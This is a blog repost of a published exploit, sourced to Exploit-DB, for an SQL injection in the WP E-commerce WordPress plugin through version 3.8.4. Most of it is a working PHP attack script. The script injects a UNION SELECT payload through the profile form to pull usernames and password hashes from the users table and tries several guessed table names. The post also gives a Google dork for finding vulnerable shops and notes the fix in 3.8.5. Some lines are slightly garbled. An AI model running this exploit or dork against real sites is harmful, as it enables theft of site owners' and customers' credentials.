Skip to content

WP E-commerce plugin

Published 08/08/2011


# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/ $value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE `id` = '$value_id' LIMIT 1";
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX: Upgrade to version 3.8.5

Bug found by: IHTeam
Simone `R00T_ATI` Quatrini
Marco `white_sheep` Rondini
Francesco `merlok` Morucci
Mauro `epicfail` Gasperini
For GetShopped as their security auditors

This code has been released under the authorization of GetShopped staff.
It will show user_login and user_pass of wp_users table;

Google Dork: inurl:page_id= "Your billing/contact details"
Follow us on Twitter! @IHTeam
*/
function help() {
echo "n";
echo " -------------------WP e-Commerce < = 3.8.4 SQL Injection---------------nn"; echo " How to use: php wp-ecommerce.php host path page_id [table_name]nn"; echo " host = Domain namen"; echo " path = Path of WordPressn"; echo " page_id = Int value of the login page of WP e-commercen"; echo " table_name = Default is wp_usersnn"; echo " Example: php wp-commerce.php www.domain.com /wordpress/ 11 wp_usersnn"; echo " ----------------------------------------------------------------------nn"; } function exploit($host,$path,$pageid,$table) { $url = $host.$path."?page_id=".$pageid."&edit_profile=true"; $buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE '1'='1"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, 3); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true"); $result= curl_exec ($ch); curl_close ($ch); echo "Now using table name: $table... "; preg_match("/(.*?)< /span>.
/", $result, $matches);
if ( !isset($matches[1]) )
$msg="Wrong table name or not vulnerablen";
else
$msg="Credential found: ".$matches[1]."n";

return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {
if (isset($argv[4]))
$table = $argv[4];
else
$table = "wp_users";

$host = $argv[1];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0))
$host="http://$host";

$path = $argv[2];
$pageid=(int)$argv[3];

/* Detecting the version, if possible */
$version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');
preg_match("/Stable tag: (.*)/", $version, $vmatch);

if ( !isset($vmatch[1]) )
$version="Not detectablen";
else
$version=$vmatch[1];

echo "Version: ".$version."n";
/* End of version detecting */

/* Executing exploit */
preg_match('/[^.]+.[^.]+$/', $host, $hmatch);
$host_name=str_replace('http://','',$hmatch[0]);

$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

foreach($tarray as $index => $val) {
echo exploit($host,$path,$pageid,$val);
}
/* End of exploit */
} else
help();

Fonte: http://www.exploit-db.com/exploits/17613/

Published in Blog

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.